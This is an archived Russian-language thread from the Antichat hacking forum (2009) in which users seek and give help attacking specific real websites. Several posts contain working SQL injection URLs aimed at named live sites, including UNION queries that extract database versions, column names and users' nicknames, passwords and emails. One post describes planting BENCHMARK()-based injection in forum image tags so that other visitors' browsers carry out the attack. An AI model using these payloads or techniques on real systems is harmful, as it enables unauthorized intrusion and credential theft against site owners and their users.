ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
25.12.2009, 03:52
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740
Репутация:
912
|
|
Сообщение от a1ertso
Всмысле через промежуточный хост?
команды на шелле пашут хоть?)
|
|
|
25.12.2009, 03:53
|
|
Новичок
Регистрация: 16.12.2009
Сообщений: 29
Провел на форуме:
101927
Репутация:
0
|
|
Сообщение от .:[melkiy]:.
команды на шелле пашут хоть?)
да)
|
|
|
|
26.12.2009, 10:31
|
|
Познающий
Регистрация: 01.02.2008
Сообщений: 53
Провел на форуме:
136161
Репутация:
5
|
|
http://logos.sakh.com/auth.php?name='&passw='
ваши идеи?
любой запрос игнорирует...
Мыслей нет.
|
|
|
|
26.12.2009, 12:34
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214
Репутация:
3171
|
|
Сообщение от superboys
http://logos.sakh.com/auth.php?name='&passw='
ваши идеи?
любой запрос игнорирует...
Мыслей нет.
эмм..а что там не так? сайт ясно говорит - что логин\пассвор инкорект.Невижу уязвимости,хоть глаз выколи.
А вот если так,то уже кое что есть,раскрытия путей.
Код:
http://logos.sakh.com/auth.php?name[]=%27&passw[]=%27
А вот и скуля
Код:
http://logos.sakh.com/?view=comments%27+union+select+version%28%29,2,3+--+
Код:
http://logos.sakh.com/?view=comments%27+union+select+COLUMN_NAME,2,3+FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20TABLE_NAME=%27logos_users%27%20+limit+2,1+--+
Version: 5.0.82sp1-log
Админка: Z: jncjcb
Ничего интересного 
Даже обидно(
Код:
http://logos.sakh.com/?view=comments%27+union+select+concat_ws%280x3a,nick,password,email%29,2,3+FROM%20logos_users+--+
Имей лимитом,если хочеш других пльзователей.привилегий на загрузку шела нет,а жаль.Хотя из админкиможно файлы править  но там чтото недописано,и поэтому не получаеться)
Последний раз редактировалось m0Hze; 26.12.2009 в 13:14..
|
|
|
|
26.12.2009, 13:50
|
|
Участник форума
Регистрация: 18.06.2008
Сообщений: 222
Провел на форуме:
2223440
Репутация:
648
|
|
Сообщение от Strilo4ka
На форумах есть возможность подгружать картинку с другого сайта, можно найти скуль иньекцию
потом втулить на форуме картинку, а в src
путь со скулей вбить и с функцией benchmark(),на популярном форуме (если конечно еще на src нет фильтра никакого ручными методами, тока еще все зависит от магикс_квотс на сервере где форум стоит, как обрабатываеться bb-код...)
Код:
BENCHMARK(count,expr)
The BENCHMARK() function executes the expression expr repeatedly count times. It may be used to time how quickly MySQL processes the expression. The result value is always 0. The intended use is from within the mysql client, which reports query execution times:
При чем всегда будут ип пользователей, не твой
когда браузер будет у них интерпретировать то будет запрашывать картинку с сайта где скуль .
Эм, нам откуда знать, упадёт он или нет? Смотря сколько человек посмотрит картинку на форуме и какой сервер у сайта.
|
|
|
|
26.12.2009, 17:11
|
|
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319
Репутация:
-16
|
|
http://www.aghamyan.am/biography.php?form_id=2'a
nekak ne moqu nayti columns..
pojalusta pomoqite..
|
|
|
|
26.12.2009, 21:20
|
|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684
Репутация:
3908
|
|
Сообщение от LokbatanLi
nekak ne moqu nayti columns..
pojalusta pomoqite..
а я никак не могу инъекцию там найти..
мысль улавливаешь?
__________________
Feci, quod potui. Faciant meliora potentes.
|
|
|
|
26.12.2009, 22:06
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
Сообщение от LokbatanLi
nekak ne moqu nayti columns..
pojalusta pomoqite..
как бы там только раскрытие путей.
http://www.aghamyan.am/biography.php?form_id[]=6
|
|
|
|
26.12.2009, 23:51
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476
Репутация:
66
|
|
может кто поможет никак не могу обходит филтрацию редирект идет ((
http://investorshub.advfn.com/boards/boards_moderated.asp?user=-177571'+order+by+1{
|
|
|
|
27.12.2009, 01:15
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476
Репутация:
66
|
|
Сообщение от YuNi|[c
может кто поможет никак не могу обходит филтрацию редирект идет ((
ну спс за ответы ((
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для .:[melkiy]:.](/avatars/avatar74910.jpg?1780459){kind=avatar}
Похожие темы
Комбинированный вид
